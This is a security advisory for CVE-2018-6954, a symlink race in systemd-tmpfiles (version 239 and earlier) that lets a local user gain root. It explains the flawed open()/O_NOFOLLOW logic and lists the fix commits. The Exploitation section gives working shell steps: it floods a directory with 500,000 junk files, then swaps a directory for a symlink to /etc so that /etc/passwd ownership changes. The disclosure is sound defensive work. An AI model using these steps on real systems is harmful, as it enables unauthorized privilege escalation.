michael orlitzky

CVE-2018-6954: systemd-tmpfiles root privilege escalation by following non-terminal symlinks

Product
systemd (systemd-tmpfiles)
Versions affected
239 and earlier
Published on
2018-12-21
Author
Michael Orlitzky
Fixed in
  1. Version 240
  2. Pull request 8358:
    1. Commit 774f79b5
    2. Commit 56114d45
    3. Commit 936f6bdb
    4. Commit caced732
    5. Commit e04fc13f
  3. Pull request 8822:
    1. Commit 31c84ff1
    2. Commit b206ac8e
    3. Commit 14f3480a
    4. Commit 5ec9d065
    5. Commit b1f7b17f
    6. Commit 16ba55ad
    7. Commit 14ab804e
    8. Commit 551470ec
    9. Commit 074bd73f
    10. Commit c7700a77
    11. Commit 4ad36844
    12. Commit 54946021
    13. Commit 1f56e4ce
    14. Commit 4c39d899
    15. Commit 1e912631
    16. Commit 62f9666a
    17. Commit a2fc2f8d
    18. Commit 7ea5a87f
    19. Commit 4fe3828c
    20. Commit 2c3d5add
    21. Commit 7e531a52
    22. Commit a12e4ade
    23. Commit 43231f00
    24. Commit addc3e30
    25. Commit 9f36a8fb
    26. Commit 7f6240fa
Bug report
https://github.com/systemd/systemd/issues/7986
MITRE
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6954
OSS-security
https://www.openwall.com/lists/oss-security/2018/12/22/1
Acknowledgments
Franck Bui of SUSE put forth a massive amount of effort to fix this, and Lennart Poettering consistently provided timely reviews over the course of a few months.

Summary

Before version 240, the systemd-tmpfiles program will follow symlinks present in a non-terminal path component while adjusting permissions and ownership. Often—and particularly with Z type entries—an attacker can introduce such a symlink and take control of arbitrary files on the system to gain root. The fs.protected_symlinks sysctl does not prevent this attack. Version 239 contained a partial fix, but only for the easy-to-exploit recursive Z type entries.

Details

The systemd-tmpfiles program tries to avoid following symlinks in the last component of a path. To that end, the following trick is used in src/tmpfiles/tmpfiles.c:

1
2
3
4
5
  fd = open(path, O_NOFOLLOW|O_CLOEXEC|O_PATH);
  ...
  xsprintf(fn, "/proc/self/fd/%i", fd);
  ...
  if (chown(fn, ...

The call to chown will follow the /proc/self/fd/%i symlink, but only once; it will then operate on the real file described by fd.

However, there is another way to exploit the code above. The call to open() will follow symlinks if they appear in a non-terminal component of path, even with the O_NOFOLLOW flag set. Citing the open(2) man page,

O_NOFOLLOW

If pathname is a symbolic link, then the open fails, with the error ELOOP. Symbolic links in earlier components of the pathname will still be followed.

So, for example, if the path variable contains /run/foo/a/b and if a is a symlink, then open() will follow it. If systemd-tmpfiles will be changing ownership of /run/foo/a/b after that of /run/foo, then the owner of /run/foo can exploit that fact to gain root by replacing /run/foo/a with a symlink. With a Z-type tmpfiles.d entry, the attacker can create this situation himself.

The fs.protected_symlinks sysctl does not protect against these sorts of attacks. Due to the widespread and legitimate use of symlinks in situations like these, the symlink protection is much weaker than the corresponding hardlink protection.

Exploitation

Consider the following entry in /etc/tmpfiles.d/exploit-recursive.conf:

1
2
d /var/lib/systemd-exploit-recursive 0755 mjo mjo
Z /var/lib/systemd-exploit-recursive 0755 mjo mjo

Once systemd-tmpfiles has been started once, my mjo user will own that directory:

mjo $ sudo ./build/systemd-tmpfiles --create

mjo $ ls -ld /var/lib/systemd-exploit-recursive

drwxr-xr-x 2 mjo mjo 4.0K 2018-02-13 09:38 /var/lib/systemd-exploit-recursive

At this point, I am able to create a directory foo and a file foo/passwd under /var/lib/systemd-exploit-recursive. The next time that systemd-tmpfiles is run (perhaps after a reboot), the following function will be called on foo:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
static int item_do_children(Item *i, const char *path, action_t action) {
        _cleanup_closedir_ DIR *d;
        struct dirent *de;
        int r = 0;

        assert(i);
        assert(path);

        /* This returns the first error we run into, but nevertheless
         * tries to go on */

        d = opendir_nomod(path);
        if (!d)
                return IN_SET(errno, ENOENT, ENOTDIR, ELOOP) ? 0 : -errno;

        FOREACH_DIRENT_ALL(de, d, r = -errno) {
                _cleanup_free_ char *p = NULL;
                int q;

                if (dot_or_dot_dot(de->d_name))
                        continue;

                p = strjoin(path, "/", de->d_name);
                if (!p)
                        return -ENOMEM;

                q = action(i, p);
                if (q < 0 && q != -ENOENT && r == 0)
                        r = q;

                if (IN_SET(de->d_type, DT_UNKNOWN, DT_DIR)) {
                        q = item_do_children(i, p, action);
                        if (q < 0 && r == 0)
                                r = q;
                }
        }

        return r;
}

The FOREACH_DIRENT_ALL macro defers to readdir(3), and thus requires the real directory stream pointer for foo, because we want it to see foo/passwd. However, while the macro is iterating, the q = action(i, p) will be performed on p which consists of the path = "foo" and some filename d, but without reference to its file descriptor. So, between the time that item_do_children() is called on foo and the time that q = action(i, p) is run on foo/passwd, I have the opportunity to replace foo with a symlink to /etc, causing /etc/passwd to be affected by the change of ownership and permissions.

But there's more: the FOREACH_DIRENT_ALL macro processes the contents of foo in whatever order readdir returns them. Since mjo owns foo, I can fill it with junk to buy myself as much time as I like before foo/passwd is reached:

mjo $ cd /var/lib/systemd-exploit-recursive

mjo $ mkdir foo

mjo $ cd foo

mjo $ echo $(seq 1 500000) | xargs touch

mjo $ touch passwd

Now, restarting systemd-tmpfiles will change ownership of all of those files…

mjo $ sudo ./build/systemd-tmpfiles --create

and it takes some time for it to process the 500,000 dummy files before reaching foo/passwd. At my leisure, I can replace foo with a symlink:

mjo $ cd /var/lib/systemd-exploit-recursive

mjo $ mv foo bar && ln -s /etc ./foo

After some time, systemd-tmpfiles will eventually reach the path foo/passwd, which now points to /etc/passwd, and grant me root access.

A similar, but more difficult attack works against non-recursive entry types. Consider the following tmpfiles.d entry:

1
2
3
d /var/lib/systemd-exploit 0755 mjo mjo
d /var/lib/systemd-exploit/foo 0755 mjo mjo
f /var/lib/systemd-exploit/foo/bar 0755 mjo mjo

After /var/lib/systemd-exploit/foo is created but before the permissions are adjusted on /var/lib/systemd-exploit/foo/bar, there is a short window of opportunity for me to replace foo with a symlink to (for example) /etc/env.d. If I'm fast enough, tmpfiles will open foo/bar, following the foo symlink, and give me ownership of something sensitive in the /etc/env.d directory. However, this attack is more difficult because I can't arbitrary widen my own window of opportunity with junk files, as was possible with the Z type entries.

Resolution

Commit 936f6bdb, which is present in systemd v239, changes the recursive loop in two important ways. First, it passes file descriptors—rather than parent paths—to each successive iteration. That allows the next iteration to use the openat() system call, eliminating the non-terminal path components from the equation. Second, it ensures that each “open” call has the O_NOFOLLOW and O_PATH flags to prevent symlinks from being followed at the current depth. Note: only the recursive loop was made safe; the call to open() the top-level path will still follow non-terminal symlinks and is vulnerable to the second attack above.

The commits in pull request 8822 aim to make everything safe from this type of symlink attack. As far as tmpfiles is concerned, the main idea is to use the chase_symlinks() function in place of the open() system call. Since chase_symlinks() calls openat() recursively from the root up, it will never follow a non-terminal symlink. Commit 1f56e4ce then introduces the CHASE_NOFOLLOW flag for that function, preventing it from following terminal symlinks. In subsequent commits (e.g. addc3e30), the consumers of chase_symlinks() were updated to pass CHASE_NOFOLLOW to chase_symlinks(), preventing them from following any symlinks.

The complete fix is available in systemd v240.